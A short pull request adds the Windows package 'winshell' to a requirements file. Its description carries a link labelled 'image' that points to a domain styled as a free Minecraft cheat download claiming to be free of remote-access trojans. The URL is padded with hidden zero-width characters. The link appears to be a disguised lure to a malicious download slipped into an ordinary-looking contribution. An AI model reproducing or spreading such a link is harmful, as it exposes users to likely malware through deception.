### PR TITLE
update requirements

### DIFF
--- a/requirements.txt
+++ b/requirements.txt
@@ -24,3 +24,4 @@ sounddevice
 discord-emoji
 pync
 WMI
+winshell


### PR DESCRIPTION
winshell is a requirement thats is missing from the list
image: https://minecraft-legit-cheat-free-no-rat-real-bypass.download/‌​⁠​‍​‍‍‍‍‌‌‌⁠‍‌​​⁠‌​‍‌‍‌⁠‌​‌⁠​